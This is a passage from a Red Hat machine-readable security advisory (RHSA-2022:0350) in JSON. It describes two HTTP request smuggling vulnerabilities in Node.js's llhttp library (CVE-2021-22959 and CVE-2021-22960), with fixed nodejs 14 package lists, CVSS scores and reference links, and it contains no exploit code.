Request/Response Smuggling\u0027)" }, "discovery_date": "2021-10-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2014057" } ], "notes": [ { "category": "description", "text": "An HTTP Request Smuggling (HRS) vulnerability was found in the llhttp library, used by Node.JS. Spaces as part of the header names were accepted as valid. In situations where HTTP conversations are being proxied (such as proxy, reverse-proxy, load-balancer), an attacker can use this flaw to inject arbitrary messages through the proxy. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "llhttp: HTTP Request Smuggling due to spaces in headers", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\".", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22959" }, { "category": "external", "summary": "RHBZ#2014057", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014057" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22959", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22959" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22959", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22959" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/" } ], "release_date": "2021-10-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-02-01T21:18:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0350" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "llhttp: HTTP Request Smuggling due to spaces in headers" }, { "cve": "CVE-2021-22960", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-10-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2014059" } ], "notes": [ { "category": "description", "text": "An HTTP Request Smuggling (HRS) vulnerability was found in the llhttp library, used by Node.JS. During the parsing of chunked messages, the chunk size parameter was not validated properly. In situations where HTTP conversations are being proxied (such as proxy, reverse-proxy, load-balancer), an attacker can use this flaw to inject arbitrary messages through the proxy. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "llhttp: HTTP Request Smuggling when parsing the body of chunked requests", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\".", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22960" }, { "category": "external", "summary": "RHBZ#2014059", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014059" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22960", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22960" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22960", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22960" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/" } ], "release_date": "2021-10-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-02-01T21:18:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", 